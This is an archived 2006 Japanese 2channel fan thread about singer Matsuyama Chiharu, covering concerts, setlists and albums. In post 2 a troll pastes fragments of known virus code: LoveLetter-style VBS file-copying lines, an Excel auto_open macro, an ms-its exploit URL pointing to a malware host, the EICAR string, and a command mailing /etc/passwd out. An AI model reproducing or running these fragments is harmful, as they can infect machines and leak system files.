2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【フォークシンガー】松山千春part2【北の大地】

1 :NO MUSIC NO NAME:2006/09/08(金) 23:56:10 ID:O+Ync8hy
千春は、愛を唄い続けている。

前スレ
http://music5.2ch.net/test/read.cgi/musicjm/1115827732/l50

関連スレ(懐メロ邦楽板)
http://bubble4.2ch.net/test/read.cgi/natsumeloj/1154390699/l50


2 :NO MUSIC NO NAME:2006/09/09(土) 00:02:45 ID:y2PdozL/
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

3 :NO MUSIC NO NAME:2006/09/09(土) 00:06:45 ID:6YMxGXY/
>>1
乙。


4 :NO MUSIC NO NAME:2006/09/09(土) 00:55:00 ID:jQvRRXnD
起承転結
千春は、転の時代を生きているんだろうな。
いや、それは違う春夏秋冬があるように、起承転結が循環しているんだと思うね。


5 :NO MUSIC NO NAME:2006/09/09(土) 10:37:51 ID:9fcEby9u
自分の苗字の”山繋がり”で、千春ともう一人”山”がつくアーティストの大ファン人。
ライブも行ったり来たりで、記念年のツアーライブは一年違いで、重ならず助かった!
今年の幕張一日目は、演奏など要らない声量の凄さに度肝を抜かれた!
九州から無理して行ったけど大正解!千春の声量はホールライブでは
収まり切れない。どこに共通が???と知人は皆首を傾げるが…
日本一の歌の上手や声量、博識や頭の切れ人間性は、あちらの”山”は
千春には遠く敵わないが、元祖ビジュアル・千春とは似た所大いに有り。
福岡大好き人の千春、将来は福岡に居を構えると福岡ライブで発言。
楽しみに待ってる〜。「日本の北の端と南の端の男」が大好きな九州女。
秋の福岡会場ライブチケットは、すでに確保済み10/14が楽しみ!
年2回は無理してでも、千春に会いに行くとの自分のノルマは今年も達成。
前スレで、ウィルスに遭遇後暫らく訪問を中止。久しぶりのお邪魔で、
長くなりすみません。あっ!あちらの”山”もウィルス貼られ捲りです。
変な所も似てた?暫らくは、自分のPCからの訪問は止めにしました。






6 :NO MUSIC NO NAME:2006/09/09(土) 17:27:09 ID:E7oPD1RH
最新50レスを選択すれば50レス過ぎたら普通になるんでないべか
詳しい人、どう?

7 :NO MUSIC NO NAME:2006/09/09(土) 21:06:57 ID:k1TJPnUl
千春の無料着うた教えてくださいm(__)m

8 :NO MUSIC NO NAME:2006/09/09(土) 21:42:29 ID:f1dfWZ96
くぅ〜!ウィルスに反応した。

9 :NO MUSIC NO NAME:2006/09/11(月) 17:42:01 ID:nVnGRbKC
>>5
加山雄三ファンOR福山雅治ふぁん?
ズラと植毛の対決なのだ。

10 :NO MUSIC NO NAME:2006/09/11(月) 17:44:32 ID:6HtEqj5/
森山なおたろうだろ >10

11 :NO MUSIC NO NAME:2006/09/11(月) 17:51:33 ID:LCIaxEWr
不運なことに人生は 一度きりのものだから

当たり前だけど重みあるな この言葉。
俺は、人生のリセットボタンが欲しい。

12 :NO MUSIC NO NAME:2006/09/11(月) 23:28:35 ID:1IYyhFtl
なになに〜福山ヅラってほんまかいな、川崎かいや?             だっふんだ!

13 :NO MUSIC NO NAME:2006/09/12(火) 23:46:39 ID:1oG+ULWi
保全

14 :詳しくないけど:2006/09/13(水) 12:57:56 ID:4t8wABY0
また改行オバケか┐(´д`)┌
だけど書いちゃうしおまけに下げちゃう。上げると変なの呼び込みやすいので。
5さんにはまたしばらく来てもらえないな〜w私は山崎かなと思ったけどどうかな?
今度きたらぜひ教えてください>5
なおウイルスコードは表示しないと悪さしないはずなので
なんとか最新50にできるまでがんばりましょ!>6
急場しのぎですが、これからしばらく
ttp://music5.2ch.net/test/read.cgi/musicjm/1157727370/レス番号
で1レスずつ表示するという手もあります。

15 :NO MUSIC NO NAME:2006/09/13(水) 17:05:49 ID:pBnlQwnS
頑張って50まで持ってくぞっと!

16 :NO MUSIC NO NAME:2006/09/13(水) 18:31:59 ID:snTcx2Rt
協力します

17 :NO MUSIC NO NAME:2006/09/13(水) 22:26:03 ID:+UYIWBsD
後、33!
ここ北の大地!
曲調から言うと、大陸の北の大地!
千春自身言ってたか!?


18 :NO MUSIC NO NAME:2006/09/13(水) 22:53:52 ID:c6V2d1Kc
WOWOW契約してる友人見つけたー!やったば!
お礼するから録画してねと頼みました

19 :NO MUSIC NO NAME:2006/09/14(木) 09:16:02 ID:S3ik1em6
>>18
ダブルアンコールの「明日のために」しびれるね〜

20 :NO MUSIC NO NAME:2006/09/14(木) 13:42:04 ID:VHyQPbcT
カラオケで千春の歌は絶対原曲のキーで歌う俺。
そんで声が出なくて、あらためて千春の凄さを確認するのです
みんな何歌うの?

21 :NO MUSIC NO NAME:2006/09/14(木) 15:21:22 ID:sQNEP6VP
はまなす!キー代えず普通だが?ただ、上手に歌うのは至難の業だわ!

22 :NO MUSIC NO NAME:2006/09/14(木) 21:14:14 ID:2TFm7vgZ
あのさー、千春の歌カラオケで歌うたびにあの人の凄さがまざまざとわかるんだけど。なにげなくさらっと歌っている曲ほど歌うと奥が深い!季節の中でも一つ下げないとキツイというかカラオケのキー高い気がする

23 :NO MUSIC NO NAME:2006/09/15(金) 00:10:38 ID:IPiHboDR
何故、千春に魅かれるのだろう。
シンプルなのに天才な楽曲。
それにトーク。
同じ血が流れているのかもしれない。

24 :NO MUSIC NO NAME:2006/09/15(金) 01:18:41 ID:7b0CRSgc
姿、形は違っても、 時がたっても伝えているんだよね。
成長していくというより、すでに天才界では出来上がっていたんだと思うね。
http://bbs001.garon.jp/test/read.php/old-movie/1155793399/l50


25 :NO MUSIC NO NAME:2006/09/16(土) 07:41:42 ID:nIIh5mRz
http://www.sanspo.com/geino/top/gt200609/gt2006091606.html

26 :NO MUSIC NO NAME:2006/09/16(土) 23:09:09 ID:U5Tzbj4t
歌碑です!
http://www.noble.knc.ne.jp/home.html

27 :NO MUSIC NO NAME:2006/09/17(日) 19:23:33 ID:ChOAkvL8
長い夜に、大空と大地の中で恋。

28 :NO MUSIC NO NAME:2006/09/19(火) 06:49:37 ID:sNq6OH8a
ミュージックフェアで聞いて、あ〜良い歌だなぁ〜って思った『信号』とゆう曲。
どのアルバムに入ってますか?

29 :NO MUSIC NO NAME:2006/09/19(火) 09:30:19 ID:4EjCbLcz
>>28
「風光る」。2003年の秋に発売されたと思う。
このときのコンサートは凄く良かったよ。

30 :NO MUSIC NO NAME:2006/09/19(火) 11:50:27 ID:VbYWV8t/
年とったのかな?

昔はなんとも思わなかったのに

ライブが見たい

31 :NO MUSIC NO NAME:2006/09/19(火) 14:35:50 ID:gkp3OMeq
http://www.amazon.co.jp/%677e%5c71%5343%6625%30c7%30d3%30e5%30fc30%5468%5e74%8a18%5ff5CD%300c%8db3%5bc4%3088%308a%300d/dp/B000HOJE06/sr=1-2/qid=1158643984/ref=sr_1_2/250-8138811-2521835?ie=UTF8&s=music

10月に出るこのCDの内容が気になる。発売がキャニオンじゃないから、
乱発ベストではなさそうだし…

32 :NO MUSIC NO NAME:2006/09/19(火) 15:05:47 ID:flscSBAm
 かつて千春のバツクでギター  を務めていた。角田    じゆんさんを見つけたんだがものすごくふけていた!今は凄い人のバツクメンバーなんだがこれが一番 びつくりした・

33 :NO MUSIC NO NAME:2006/09/19(火) 15:15:28 ID:flscSBAm
角田さんは、65ぐらいに 見えたんですが    いつたい何歳なのでしょうか?20年ぐらい前は、  物凄くかつこよかったんですが

34 :NO MUSIC NO NAME:2006/09/19(火) 19:02:46 ID:O4OkhacP
>>29
全く同感です。「風光る」のライブは本当によかったー
最後に歌った「生きがい」が凄くよかった

35 :NO MUSIC NO NAME:2006/09/19(火) 20:18:46 ID:nSJFzhrn
>>31

http://headlines.yahoo.co.jp/hl?a=20060913-00000031-sanspo-ent

これじゃないの?

36 :NO MUSIC NO NAME:2006/09/19(火) 20:21:44 ID:sNq6OH8a
>>29>>34
早速『風光る』のCD注文しました♪
ちなみに『君を忘れない』と『時流』は、どのアルバムに入ってますか?

37 :NO MUSIC NO NAME:2006/09/19(火) 20:47:58 ID:qZmv9db+
君を忘れない→ツアー
時流→    風光る  だべ。

38 :NO MUSIC NO NAME:2006/09/19(火) 20:49:39 ID:qZmv9db+
ツアー  TOUR ね。

39 :NO MUSIC NO NAME:2006/09/19(火) 21:20:42 ID:O4OkhacP
>>36
チー様のHPにデスコグラフィテーってのがあるよ、初期のはないけど
http://columbia.jp/~chiharu/

40 :NO MUSIC NO NAME:2006/09/19(火) 22:35:26 ID:G/eE85eE
千春さんが尊敬してる人って言ってライブで少し違う方の歌う歌は大塚搏堂でおK??

41 :NO MUSIC NO NAME:2006/09/19(火) 22:43:52 ID:sNq6OH8a
>>37
有難うございます。
またまた早速注文しました♪
皆さんミュージックフェアは御覧になられましたか?

42 :NO MUSIC NO NAME:2006/09/19(火) 23:05:43 ID:Aa3+thud
千春、23日のつま恋出るの?
拓郎とのバトル楽しみ!

43 :NO MUSIC NO NAME:2006/09/20(水) 07:05:01 ID:gu+SCtX4
かぐや姫側の応援ゲストなら考えられますね
以前、ラジオでもつま恋に言ってみたいとの話をしていたし、
正やんからも30周年のお祝いメッセージを貰ってましたね

44 :29:2006/09/20(水) 10:46:57 ID:g2unVAqd
>>41
千春さん一人での出演、MC有りは 相当異例らしいです。
「俺は好きだな〜クセのある自分が」
「あなたが何に求めるか、あなたが何に価値を求めるかで大きく変わっていくと思います」
千春さんのMCも聞けて凄くよかった。
41さん、是非、千春さんのコンサートに行ってみてください。
コンサートでの唄はもっともっと素晴らしいですよ。

45 :NO MUSIC NO NAME:2006/09/20(水) 13:00:56 ID:4qCn8ehJ
>>44さん、有難うございます!
自分もあのMCには感動しました。
ミュージックフェアはHDDに録画してあるので、オンエア後から、毎晩の様に見ています。
コンサート有れば是非行ってみたいと思います。

46 :NO MUSIC NO NAME:2006/09/20(水) 13:19:13 ID:Yq/WTq80
私の地方ではミュージックフェアが放映されてません orz
誰か、うpしてください!

47 :29:2006/09/20(水) 13:53:36 ID:g2unVAqd
>>45
秋のコンサートツアーの日程です。
http://columbia.jp/~chiharu/tour.html
コンサートに行けば本当の松山千春の素晴らしさを味わえることが出来ます。
但し、相変わらずチケットを入手するのが困難です。

48 :NO MUSIC NO NAME:2006/09/20(水) 19:39:51 ID:7OWtEOZ7
YouTubeで検索したら、命とか季節の中でとか、いろいろUPされてました。
はっときます。
http://www.youtube.com/results?search_query=%E6%9D%BE%E5%B1%B1%E5%8D%83%E6%98%A5

49 :NO MUSIC NO NAME:2006/09/21(木) 13:20:07 ID:Kw0SLWKs
アルバム・明日のためにがすきなんですが皆さんは、なにがすきですか?    愛を奏では、名曲だと 思います。旅立ちという ビデオで見たときこんな 曲もつくれるのかやっぱりこの人は天才だなあと  認識しました。 長い夜よりこっちの 方がいいですね

50 :NO MUSIC NO NAME:2006/09/21(木) 19:28:35 ID:v/bBngAp
>>48
季節の中で いいね。
まじ唄うまいわ。

51 :NO MUSIC NO NAME:2006/09/21(木) 19:38:09 ID:v/bBngAp
ユーチューブの動画をDLしたいけど、方法がわからん。

52 :NO MUSIC NO NAME:2006/09/21(木) 19:43:52 ID:v/bBngAp
>>49
僕はね、いろいろ好きなアルバムあるけど。
自由の彼方へ が好きだな。
憂い とか 物語 いつのまにか とか名曲がいっぱい。
ってか、他のアルバムを含め名曲が多すぎ。

53 :NO MUSIC NO NAME:2006/09/21(木) 20:29:51 ID:hBY1yBJe
変わったのは姿、形だけだな。

54 :イタコの千春 ◆tpLqwERCIU :2006/09/21(木) 23:25:15 ID:VO5XcGBR
http://music5.2ch.net/test/read.cgi/musicjm/1157727370/l50

だな。
お気に入りにだな。登録してアクセスしておくれ。
改行おばけとは、さよならできるべ。

同じようなウイルス貼るヤツは死ぬから。気にせずに。
いや、死ぬという言葉をあからさまに表現するのはいやだが、
俺の予言っていうのかな。インスピレーションは当たるんだ。まじ、ホンマ。

生命の尊さをを唄う俺からすれば、矛盾するんだが。許せ。
ノートン先生が、几帳面に反応してくれて うざい。からーーーーー。




55 :イタコの千春 ◆tpLqwERCIU :2006/09/21(木) 23:33:27 ID:VO5XcGBR
ここで予言しよう。

NPB 今年の日本一は、北海道日本ハムファイターズであると。


56 :NO MUSIC NO NAME:2006/09/22(金) 19:13:27 ID:bjaEskKK
>>48
工藤静香&松山千春
をみたけど、なんか工藤静香がかわいそうに思えてきた。
歌唱力にこんなに差があるとね。

57 :NO MUSIC NO NAME:2006/09/22(金) 21:58:58 ID:3cYEuyFd
松山千春のファンって30〜40代の人がほとんどなのかな?

58 :NO MUSIC NO NAME:2006/09/23(土) 18:39:06 ID:XCuKHr9w
松山千春は血液型はO型ですか?

59 :NO MUSIC NO NAME:2006/09/23(土) 18:40:29 ID:aOmBlnqP
長ーーーーい夜をー♪

60 :NO MUSIC NO NAME:2006/09/23(土) 21:18:01 ID:lpjl5Rof
飛び越えてみたいー

長い夜を飛び越えるって、どういうこと?わかる人おしえて

61 :NO MUSIC NO NAME:2006/09/24(日) 01:15:54 ID:nuRVnckb
公園で星空を見ながら、ロマンチックにひたりながら、
キスをしたりなんかして、いろいろ進んでいってHしたりして
夜を過ごす。

そんな感じかな。え?

も夜も夜した想いを飛び越えて、好きな人との時間を共有したい。そんな
ピュアな心だね >>60


62 :NO MUSIC NO NAME:2006/09/24(日) 21:06:37 ID:gimYOEW4
やっぱり再生はみなキーが下がっていますか?今さ、カラオケはどのメーカーも千春のむかしの曲は原曲どおりだよね。するとやはりキーが高いからなぁ〜。ひとつ下げないかんわ

63 :NO MUSIC NO NAME:2006/09/24(日) 22:40:24 ID:S08mzFTS
>>51
Firefoxを利用する。
VideoDownloader Firefox Extensionを入れる。
http://javimoya.com/blog/youtube_en.php
FLV PlayerをDLしてローカルでflvファイルを再生できるようにする。
http://www.martijndevisser.com/blog/article/flv-player-updated

他に良い方法ないかなあ。

64 :NO MUSIC NO NAME:2006/09/25(月) 09:54:54 ID:7OgZ8wD9
>>63
レスありがとう。

65 :NO MUSIC NO NAME:2006/09/29(金) 23:00:14 ID:iEg9mzy4
質問いいですか?

ずっと昔なんですけど
「最後のストライク」って二時間ドラマ(名前違うかもです)
で流れた曲は何て曲かわかりませんか?

すごくいい曲だった記憶があるんですが曲名がわからないんです…

知ってる方いましたら教えてください

お願いします

66 :29:2006/09/29(金) 23:06:46 ID:o0NwW+Bk
>>65
「君に」 です。
シングルで発売されています。
アルバム「LaLaLa」、アルバム「起承転結9」にも収録されています。

67 :NO MUSIC NO NAME:2006/09/29(金) 23:44:13 ID:iEg9mzy4
>>66
「君に」ですか(≧▽≦)
ご丁寧なレス本当にありがとうございます

探してみますね


68 :29:2006/09/30(土) 00:14:52 ID:1tsnu5d8
>>67
ご丁寧にどうも。
いつでも質問OKですよ。


69 :NO MUSIC NO NAME:2006/09/30(土) 01:20:55 ID:qzvYxplb
愛している〜
一言〜
言えなかった〜
バカだな〜

70 :NO MUSIC NO NAME:2006/09/30(土) 17:30:26 ID:7eE7ZSLT
どっかのブログだかコンレポで「君に」を
リクエストしたら首かしげて夏目氏と
途方に暮れてたらしい。
歌詞のみか曲の存在自体うる覚えワロタ

71 :NO MUSIC NO NAME:2006/09/30(土) 19:46:15 ID:WF+cMLAb
でも必ず
いつかは
この心が 届くと
思う
君にーーーーーーーーー

72 :29:2006/09/30(土) 20:58:43 ID:1tsnu5d8
>>70
千春にはよくあることだよ。
気にしない気にしない。

73 :NO MUSIC NO NAME:2006/10/01(日) 02:44:25 ID:O2SKL+EH
俺は好きだなぁ〜♪
クセの有る自分がぁ♪

74 :NO MUSIC NO NAME:2006/10/01(日) 06:22:01 ID:jNNZf3fU
今日の「D アンビシャス」に 超保存版と書いてる・・楽しみだ (北海道のみ)

75 :NO MUSIC NO NAME:2006/10/01(日) 19:17:30 ID:shLsV/1+
なかなか感動的だった。
デビューのきっかけが早世したSTVのDというから
同局でしか作れない内容だったかもしれない。

道外の人にも見せたいところだが、さすがに誰かUPするかな。

76 :NO MUSIC NO NAME:2006/10/02(月) 04:27:08 ID:3AlKeQ+u
君ーにー

77 :全然しらん:2006/10/02(月) 20:52:47 ID:h1FOlGtV
昨日、千春テレビ出たの?こちら名古屋だけど、どこの番組なのかな(>_<)

78 :NO MUSIC NO NAME:2006/10/02(月) 21:53:30 ID:hrK93INQ
北海道のSTVです、1979年に放送した特番の映像を少し使ってました
あと、現在のはげ頭とw STVラジオでやった30周年記念の放送を映像付きで流してました
千春が竹田さんを語って泣いてしまった場面でした。特に歌はなかったです、得意の語りのみw

79 :NO MUSIC NO NAME:2006/10/03(火) 07:52:08 ID:8If+Itsb
78ありがとう(^-^)やはり名古屋はおよびでなかったわね・・・(>_<)

80 :NO MUSIC NO NAME:2006/10/03(火) 10:55:48 ID:M7iiTlS0
名古屋って千春がよく潜伏?してるらしい
札幌名古屋福岡が友達多いみたいね

81 :29:2006/10/03(火) 13:13:37 ID:ExXWJ1Ai
>>80
ですね。
各地にゴルフ仲間居ますからね。
今回のつま恋も名古屋から行きましたよね。

82 :NO MUSIC NO NAME:2006/10/03(火) 23:00:30 ID:8If+Itsb
名古屋は宮地ゆきおいうラジオのアナウンサーや舞台作りのはまじさんなど友達付き合いみたいだからツアーも名古屋は外さないだな。助かってます(^O^)

83 :NO MUSIC NO NAME:2006/10/03(火) 23:35:34 ID:M7iiTlS0
宮地さんと千春のトークでいつだったか笑ったなぁ、北海道のラジオを名古屋で録った時
宮地さんメチャメチャ面白かった、いつもあんな感じなんだべか、千春が圧倒されてたもん
なんかデビュー前からの知り合いだと言ってた記憶があるなぁ

84 :NO MUSIC NO NAME:2006/10/04(水) 14:22:22 ID:vVI/Qtd2
○米マクドナルド−調理油切り替え遅れ和解金9億円支払い
  米ハンバーガー店チェーン大手マクドナルドは、フライドポテトなど揚げ物に使う油を健康に配慮した
新タイプに切り替えると発表しながら実施が遅れたことを同社が適切に公表しなかったとされる訴訟で、
和解金など計約850万ドル(約9億円)を支払うと先月(05年2月)までに発表しています。
  マクドナルドは2002年9月、心臓疾患の原因になると指摘された「トランス脂肪酸」を減らすため、
調理油を03年2月までに新しいタイプに替えると発表しました。
  ところが、実施が遅れたため03年2月に遅れの事実を公表しましたが、米国の健康問題活動家らは03年、
消費者への告知が不十分だったとして損害賠償などを求め、カリフォルニア州の地裁に提訴していました。

  こうしたトランス脂肪酸の害について、日本ではほとんど認知されておらず、
トランス脂肪酸含有量の表示義務もないため、全く野放し状態です。
  前述のマクドナルドでも、日本での調理油切り替えの発表は未だにされておりません。

85 :NO MUSIC NO NAME:2006/10/04(水) 22:00:46 ID:0wWwrmen
ハイ、宮地のしゃべりは悟りひらいた正統派名古屋弁!あの域までいくと普通の会話でおもろいぞ!わしもド名古屋だけどあそこまでの名古屋弁は使えない(;^_^A

86 :NO MUSIC NO NAME:2006/10/04(水) 22:42:17 ID:35zIpANy
ブー!未だウィルスが張り付いてた。

87 :NO MUSIC NO NAME:2006/10/06(金) 16:52:39 ID:Bjd+evuP
今日から秋コン始まるな。川口からスタートだ!

88 :NO MUSIC NO NAME:2006/10/06(金) 22:07:18 ID:HqcM1FQt
ここはネタバレ禁止ですか?
もし良かったら今日行った方レポお願いします!

89 :NO MUSIC NO NAME:2006/10/06(金) 22:15:55 ID:6nBcTpUB
ネタバレ禁止を希望します

90 :イタコの千春 ◆tpLqwERCIU :2006/10/06(金) 22:24:30 ID:UCLNUlJt
いや、疲れた。
俺の未発表曲で、当時19歳の時に作った”老人のバラード”って曲があるんだが、
かいつまんで説明すると、4畳半のアパートに住み着いた若者が61年間だな。
そのアパートで暮らしていく、そして最期を迎える、でも あと3日だけ生きさして下さい。
あと3日だけ お願いします という訳わからん曲だが、。。。・
その話を小田にしたら、あいつも同じような曲作ってたんだって。
NHKのみんなの歌用に頼まれて作ったらしいけど、いかにもあいつらしいな。
あいつも天才界の住人なのかもしれないなと、ふと思ったりしたけど、
そう簡単に天才界に来てもらっても困るんだ。
 天才界でも、俺は下っ端だからな。ますます下っ端になるのいやだから。
(今日は何て謙虚なんだろ)。


本音

俺は、天才界の中でも超一流。小田なんか  以下 省略。

小田ファンの方、気分を害さないでくれ。これだけは言える。あいつ 俺より
過激だからな。マジに。危険よ、俺より。




91 :NO MUSIC NO NAME:2006/10/06(金) 23:22:32 ID:7OOc4zh7
曲のおしながきをよろしくお願いします、一応予習が好きな23の乙女です!

92 :29:2006/10/07(土) 08:53:39 ID:Kw19hpqh
>>91
10月6日 川口リリアホール

前半 
 旅立ち
 銀の雨
 車を止めて
 もう一度
 クレイジー・ラブ

後半 
 国道38号
 君のために作った歌
 陽は昇る
 北の大地
 祈り

アンコール
 月あかり
 俺の人生
 人生の空から
 ひとりじめ

ダブルアンコール
 雪化粧

93 :NO MUSIC NO NAME:2006/10/07(土) 11:35:12 ID:QcSBjxOG
はじまったんだね。。。うれしいなぁー。。。13日の福岡、楽しみ。。。

94 :NO MUSIC NO NAME:2006/10/07(土) 13:33:24 ID:ROaOuCJT
う〜ん あり得ない選曲だなぁ( ゚ρ゚)

95 :マコチャン本当は55歳:2006/10/07(土) 21:18:09 ID:Y2y3KSHk
92ご丁寧にありがとう、チュ!

96 :NO MUSIC NO NAME:2006/10/08(日) 00:44:17 ID:CHj/7pUJ
小田は過激だな >>90
ttp://www.dontaku.com/others/burger.swf
ttp://up2.viploader.net/mini/src/viploader77196.swf

97 :NO MUSIC NO NAME:2006/10/08(日) 00:57:34 ID:Wm9OLjRl
初めてライブに行こうかと本気で考えています。
ツアー中、やる曲は結構変わったりするのでしょうか?
正直川口のリストだとあまり知っている曲がなくて。
ベスト盤に入っているような古い曲がいっぱい聞きたいと思ってたら
今回のツアーは違うのかなあ。。
旅立ちやってくれるのはすごくうれしいです。


98 :NO MUSIC NO NAME:2006/10/08(日) 03:27:56 ID:dEqxAkq6
松山千春さんの歌で、ハウスのシチューのCM曲のタイトルを教えていただけませんか?
優しい気持ちになるんです。。

99 :る〜じゅ:2006/10/08(日) 04:49:21 ID:BBa+Fg2E
です。だと思います。

100 :NO MUSIC NO NAME:2006/10/08(日) 07:45:37 ID:GjWlLPc8
100

101 :NO MUSIC NO NAME:2006/10/08(日) 10:10:26 ID:dEqxAkq6
>>99 

る〜じゅさん、ありがとうございます。
『です。』なんですね。

102 :名古屋の松山:2006/10/08(日) 20:26:22 ID:O7iBwtTE
本日名古屋センチュリーホールのチケット届きましたので26日は楽しんできます!一階のVIP席あたりました!ありがとう☆

103 :29:2006/10/09(月) 10:24:40 ID:YKkWKwIX
>>97
多少、選曲を変更してきますよ。
ちなみに30曲程用意していると思いますがツアー中に一度も歌わない曲もあるとのことです。
千春がこれがベストだと思ったらアンコール意外は変更しないことも。
もし、千春のライブに行ける機会がありましたら行ってみたらいいですよ。
知らない曲が多くても、あのMCと絶唱には絶対に満足出来ると思います。
俺も友達を連れて行くと今度も行きたいと言われますから。

10月8日山梨県民文化ホール

前半
 旅立ち
 銀の雨
 車を止めて
 もう一度
 クレイジー・ラブ
後半
 足寄より(弾き語り)
 生命(弾き語り)
 現実(弾き語り)
 北の大地
 祈り
アンコール
 星空の夜は更けて
 俺の人生
 純-愛する者たちへ-(ワンコーラス)
 人生の空から
 恋ブギ
 今日限り
 長い夜
ダブルアンコール
 雪化粧

104 :NO MUSIC NO NAME:2006/10/09(月) 15:21:08 ID:QRbkyIjD
ネタバレほどつまらんものはないな

105 :97:2006/10/09(月) 16:07:58 ID:4Yl3KeMZ
>>103
ありがとうございます!
チケット申し込んでみます。

106 :29:2006/10/09(月) 23:35:43 ID:YKkWKwIX
>>105
どうも。
簡単にチケット取れるの?

107 :97:2006/10/09(月) 23:54:31 ID:4Yl3KeMZ
>>106
いいえ。
地道に申し込むだけです...

108 :NO MUSIC NO NAME:2006/10/10(火) 01:28:15 ID:86OZM6F7
クレイジーラブは最高です。  今回のツアーではこれが  一番だと思います。皆さんはどれが好きですか?

109 :NO MUSIC NO NAME:2006/10/13(金) 01:28:32 ID:Zjbd7RDl
わかれ が好き。

110 :NO MUSIC NO NAME:2006/10/13(金) 11:12:14 ID:HHEh01tE
今日はWOWOWだよ

111 :NO MUSIC NO NAME:2006/10/13(金) 13:35:06 ID:vlZ7yRBw
今日の6時30分から、福岡サンパレスで幕張初日以来、千春にご対面です。
新曲、動く世界と日本の情勢を、どう語るか話も楽しみ。
では、皆様お先に失礼します!

112 :NO MUSIC NO NAME:2006/10/13(金) 22:08:35 ID:FqT/jMH6
wowwowの番組としても選曲の好みとしても
25周年の方が個人的には感動したかな

不意に飛び込んできて久しぶりだったからだろうか?
あん時は本当に震えるくらいの衝撃だった。

113 :フォーク長渕:2006/10/13(金) 23:18:58 ID:At6XNZB0
今回のWOWOWの編集は抜群に良かった。
特に「帰郷」,「愛しているから」,「君のために作った歌」,
「初恋」を外さないところが。
WOWOWにもわかってる人間がいるということか。

1994年夏,当初のテレビガイドの発表どおり,名古屋城深井丸の
ひとり唄を全曲放送しなかったことが悔やまれる。
「今失われたものを〜」,「海を見つめて」,「微笑」・・・

114 :NO MUSIC NO NAME:2006/10/13(金) 23:24:11 ID:jysRBd0J
WOWOWって曲やMCどのくらいカットされてました?

115 :NO MUSIC NO NAME:2006/10/13(金) 23:30:35 ID:8wo1pxeW
WOWOWリスト

1.現実
2.です。
3.おいで僕のそばに
4.帰郷
5.愛しているから
6.旅立ち
7.銀の雨
8.季節の中で
9.長い夜
10.ひまわり
11.オロオロ
12.egoist
13.ナイト・エンジェル
14.流れ星
15.SWAY
16.恋ブギ
17.大空と大地の中で
18.君のために作った歌
19.初恋
20.明日のために

116 :NO MUSIC NO NAME:2006/10/14(土) 08:01:37 ID:Q2cMocA4
WOWWOW見ました ナイトエンジエル・流れ星が良かったですねー明日のためにも最高でした。この頃の曲が一番好きなのでうれしかつたです。

117 :NO MUSIC NO NAME:2006/10/14(土) 08:09:19 ID:Q2cMocA4
出来たら秋のライブもWOWWOWで放送してほしいです。 お金のことや健康面のことなのでいけない人がたくさんいるはずです。

118 :NO MUSIC NO NAME:2006/10/14(土) 09:52:16 ID:Q2cMocA4
再放送はいつですか?

119 :NO MUSIC NO NAME:2006/10/14(土) 11:12:51 ID:wotnkn0X
>>118 >>111です。
11/9に再放送です。昨日の福岡サンパレスは、素晴らしいとかでは無く、
歌も話も”凄い人だ千春は”の一言です。
此から先、この様な人は出てくるのだろうか?と考えてしまいまたした。
自身で「日本一の歌手」の歌を聞いて下さいと紹介しましまが、
「松山千春が松山千春であるかぎり…」正にあの文言の通りです。
千春にとって福岡は思い入れの強い街、
幕張のチョットよそ行きな千春では無く、実にリラックス。
デビュー時からの福岡と九州での思いで話で、
前日の佐賀のライブ同様時間も超オーバ!
20代の時、 結婚したかった福岡の彼女の為に、
福岡に住むのに真剣に土地を探したてんまつ等、
今迄聞いた事なかった話も沢山。過去のどのライブより“超高級品”のライブでした。
有難う千春、此からも付いて行きます!

120 :NO MUSIC NO NAME:2006/10/14(土) 13:29:47 ID:Q2cMocA4
教えて頂きありがとうございました。

121 :NO MUSIC NO NAME:2006/10/14(土) 15:30:29 ID:eoefW/Rd
>>114
664 :NO MUSIC NO NAME:2006/10/13(金) 13:16:29 ID:jysRBd0J
http://news18.2ch.net/test/read.cgi/mnewsplus/1160691382/l50


122 :NO MUSIC NO NAME:2006/10/15(日) 20:49:28 ID:xyGDOHqJ
【文化】団塊世代の青春、“フォークソング”ブーム再来 チケット買い手は中高年男性が中心 復刻CDやアコギも人気
http://news19.2ch.net/test/read.cgi/newsplus/1160908967/l50
団塊世代の青春を彩ったフォークソングブーム再来で、北陸の音楽市場が勢いづいている。

石川県内では今秋、団塊のヒーローといわれる吉田拓郎や南こうせつらのコンサートがめじ
ろ押し。中高年男性が買い手の大半を占め、一カ月足らずで完売したチケットもある。CD店
では当時のレコードを再現した商品の売り上げが伸びており、音楽業界にも団塊ビジネスの
風が吹いている。

石川県の津幡町文化会館シグナスが来月開く、南こうせつのコンサートは、約760席のチケッ
ト(4、5千円)が一般発売から一カ月足らずで売り切れた。同会館は「50、60代の男性が中
心で、大阪から買いに来る人もおり、予想以上の売れ行きだった」と話す。

